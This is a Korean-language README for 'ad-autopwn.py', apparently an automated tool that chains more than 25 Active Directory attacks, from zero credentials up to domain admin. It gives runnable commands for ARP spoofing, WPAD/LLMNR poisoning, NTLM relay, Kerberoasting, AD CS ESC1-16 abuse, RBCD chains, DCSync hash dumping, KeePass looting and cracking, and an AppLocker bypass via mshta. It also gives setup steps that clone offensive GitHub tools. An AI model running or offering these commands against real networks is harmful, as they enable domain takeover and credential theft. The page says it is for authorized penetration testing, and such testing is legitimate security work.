
제로 인증에서 도메인 관리자까지의 자동화된 Active Directory 공격 체인. Kerberoast, AD CS ESC1-16, Shadow Credentials, RBCD, DCSync, Synacktiv 2026 반사 익스플로잇을 포함한 25개 이상의 기술을 연결합니다. 승인된 침투 테스트 전용입니다.
제로 인증에서 도메인 관리자까지 — 자동화된 Active Directory 공격 체인
25개 이상의 공격 기법을 연결하여 Active Directory 환경을 손상시키는 완전 자동화된 침투 테스트 도구입니다. 승인된 보안 평가용으로 설계되었습니다.
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ 제로 인증에서 도메인 관리자까지 — 공격 체인
발견 | 스니핑 | ARP | WPAD | WSUS | PXE | AD CS | SCCM | 로스트
BloodHound | 리플렉트 | 루트 | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH가 설정된 경우 무료 해시)--spray-password로 선택적 활성화).library-ms / .theme / .url 파일bloodhound-python -c All 수집 + ZIP 분석WriteSPN, AddKeyCredentialLink, GenericAll/Write, WriteDacl/Owner, WriteAccountRestrictions, AddAllowedToAct, ForceChangePasswordWriteSPN → ghost-SPN 업그레이드 (CVE-2025-58726)AddKeyCredentialLink → 섀도 자격 증명 → PKINIT → NT 해시Computer에 대한 GenericAll / WriteAccountRestrictions → RBCD 체인 → 관리자 TGS-altservice 재작성, 한 단계로-altservice를 통한 인라인$ 접미사 재시도 → 자동 생성된 <user>$ 시스템 계정을 통한 Linux 사용자용 TGT → GSSAPI SSHnxc -x를 통한 Get-CimInstance Win32_Process; mysql/sqlcmd/runas/KeePass/--password 스타일 플래그의 비밀번호 정규식 grepC:\Users에서 *.kdbx 찾기, smbclient로 다운로드, keepass2john | hashcat -m 13400# 완전 자동화 — 제로 자격 증명 체인 (모든 것을 자동 발견)
sudo ./ad-autopwn.py
# 자격 증명 포함 — 전체 체인
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# AWS / VPC 랩 (레이어 2 공격 차단됨) — 자동 발견은 여전히 작동
sudo ./ad-autopwn.py --no-arp --no-wpad
# 사전 인증 자격 증명 발견 (잠금 방지)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# BloodHound 그래프 수집 + 자동 고가치 분석
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# 달러 티켓 — 자동 생성된 root$ 시스템 계정을 통한 'root'용 TGT
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# RBCD+KCD 체인 — 전체 ghost-SPN + RBCD + altservice 재작성, 한 번에
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# AppLocker 우회
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# 드라이 런 (모든 명령 출력, 실행하지 않음 — 백그라운드 프로세스 포함)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1
| 단계 | 인증 | 설명 |
|---|---|---|
full | 선택 사항 | 완전 자동화 체인 (자격 증명 유무 자동 감지) |
sniff | 없음 | 수동적 L2 트래픽 발견 |
discover | 없음 | kerbrute + CLDAP + AS-REP + pre2k + (선택적) 스프레이 |
arp | 없음 | ARP 스푸핑 + NTLM 캡처 |
wpad | 없음 | WPAD/LLMNR 중독 (mitm6 / Responder) |
wsus | 없음 | WSUS NTLM 릴레이 |
pxe | 없음 | PXE 부트 자격 증명 도용 |
enum | 필요 | 대상 열거 (릴레이 대상, 무제한 위임, WebClient 호스트) |
enrich | 필요 | nxc 13개 모듈 배터리 (LAPS, timeroast, MAQ, nopac, zerologon, …) + 자동 소비자 |
bloodhound | 필요 | bloodhound-python -c All + 분석 + 자동 실행 체인 |
roast | 필요 | Kerberoast + AS-REP Roast |
adcs | 필요 | AD CS 익스플로잇 (ESC1-ESC16) |
sccm | 필요 | SCCM NAA 자격 증명 도용 |
exploit | 필요 | 특정 대상에 NTLM 반사/강제 익스플로잇 |
dcsync | 필요 (DA) | 도메인 해시 덤프 |
loot | 필요 | 프로세스 명령줄 수집 + KeePass 발견/크래킹 |
tgs-rewrite | 없음 | 오프라인 ccache sname 재작성 (tgssub 스타일 KCD 우회) |
dollar-ticket | 필요 | KDC $ 접미사 재시도 공격 (Linux GSSAPI 대상) |
rbcd-kcd | 필요 | 전체 RBCD+KCD 체인 오케스트레이터 (WriteSPN → ghost → RBCD → S4U+altservice) |
reflect-tcpport | 필요 | CVE-2026-24294 LPE 프리미티브 (tcpport를 통한 SMB) |
reflect-loopback | 필요 | CVE-2026-26128 LPE 프리미티브 (유니코드 SPN을 통한 Kerberos 루프백) |
kerb-reflect | 필요 | CVE-2025-58726 ghost-SPN AP-REQ 반사 |
apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
/opt/tools/에 클론)git clone https://github.com/mverschu/CVE-2025-33073 /opt/tools/CVE-2025-33073
git clone https://github.com/dirkjanm/krbrelayx /opt/tools/krbrelayx
git clone https://github.com/Wh04m1001/DFSCoerce /opt/tools/DFSCoerce
git clone https://github.com/ShutdownRepo/ShadowCoerce /opt/tools/ShadowCoerce
git clone https://github.com/ShutdownRepo/pywhisker /opt/tools/pywhisker
git clone https://github.com/dirkjanm/PKINITtools /opt/tools/PKINITtools
git clone https://github.com/csandker/pxethiefy /opt/tools/pxethiefy
git clone https://github.com/garrettfoster13/sccmhunter /opt/tools/sccmhunter
git clone https://github.com/dirkjanm/mitm6 /opt/tools/mitm6
git clone https://github.com/Hackndo/pyGPOAbuse /opt/tools/pyGPOAbuse
git clone https://github.com/Hackndo/WebclientServiceScanner /opt/tools/WebclientServiceScanner
git clone https://github.com/almandin/Certihound /opt/tools/Certihound
pipx install coercer
pipx install wsuks --system-site-packages
kerbrute — 최신 바이너리를
https://github.com/ropnop/kerbrute/releases 에서 받아 /usr/local/bin/에 설치userenum-cldap — 동반 CLDAP NetLogon-핑 열거기 (이 저장소에
userenum-cldap.py로 포함됨; /usr/local/bin/userenum-cldap에 설치)asn1tools — pip install asn1tools (CLDAP 열거 런타임 종속성)# APT 패키지
sudo apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists